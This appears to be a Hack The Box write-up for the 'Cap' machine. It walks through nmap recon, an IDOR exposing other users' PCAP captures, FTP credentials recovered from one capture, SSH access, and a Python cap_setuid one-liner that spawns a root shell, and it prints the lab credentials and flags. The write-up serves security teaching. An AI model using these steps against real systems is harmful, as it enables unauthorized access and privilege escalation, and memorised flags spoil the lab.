Hack The Box
Cap
Summary
Cap is an Easy Linux machine hosting a network security dashboard. An IDOR
in the capture download feature exposes other users' PCAP files, one of which
contains plaintext FTP credentials. Those credentials grant SSH access, and a
cap_setuid capability set on the Python binary is abused to escalate to
root.
Machine Information
| Name | Difficulty | OS | Platform |
|---|---|---|---|
| Cap | Easy | Linux | Hack The Box |
Attack Path
- Nmap reveals FTP, SSH and HTTP services.
- A web dashboard allows downloading PCAP captures.
- An IDOR exposes other users' capture files.
- PCAP analysis reveals plaintext FTP credentials.
- SSH access is obtained as the user
nathan. - Enumeration finds the Python binary with the
cap_setuidcapability. - The capability is abused to escalate to root.
Reconnaissance
Initial service enumeration was performed with Nmap.
sudo nmap -sV -sC -A 10.129.10.156
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 22 | SSH | OpenSSH 8.2p1 |
| 80 | HTTP | Gunicorn |
The HTTP service hosted a Security Dashboard web application.
Web Enumeration
The dashboard displayed network traffic statistics and allowed users to download PCAP files of captured traffic.
The download URL used a sequential numeric parameter:
http://10.129.10.156/data/5
Changing the ID to another value exposed other users' captures
(/data/0), confirming an Insecure Direct Object Reference (IDOR).
PCAP Analysis
The capture at /data/0 was downloaded and opened in Wireshark. The FTP
traffic inside contained plaintext credentials.
nathan : Buck3tH4TF0RM3!
Initial Access
The recovered credentials were reused to authenticate over SSH as nathan.
ssh nathan@10.129.10.156
This provided the initial foothold on the system.
Privilege Escalation
Enumeration
linPEAS was run to look for escalation vectors and flagged an interesting
capability on the Python binary.
scp linpeas.sh nathan@10.129.10.156:/tmp/
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
Abusing cap_setuid
The cap_setuid capability allows the process to change its effective UID, so
Python can be used to set UID 0 and spawn a root shell.
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
This successfully spawned a shell as root.
Flags
User
cat /home/nathan/user.txt
16454aadc23615650b36d19fe560d2cd
Root
cat /root/root.txt
170f052d3f6be9b50f63a47f8d88421b
Vulnerabilities Identified
Insecure Direct Object Reference (IDOR)
- The dashboard served PCAP captures using a sequential ID (
/data/5). - Changing the ID (
/data/0) granted access to other users' captures.
Impact: unauthorized access to internal packet captures and disclosure of plaintext credentials.
Insecure Linux Capability (cap_setuid)
- The Python binary had
cap_setuidset, allowing any user running it to change UID to 0.
Impact: direct privilege escalation to root.
Tools Used
- Nmap
- Wireshark
- SSH
- linPEAS
- Python
Key Takeaways
- IDOR vulnerabilities can expose sensitive internal data such as packet captures.
- Packet captures frequently contain plaintext credentials.
- Linux capabilities like
cap_setuidare a dangerous and often overlooked privesc vector. - Proper privilege and file-permission management is critical.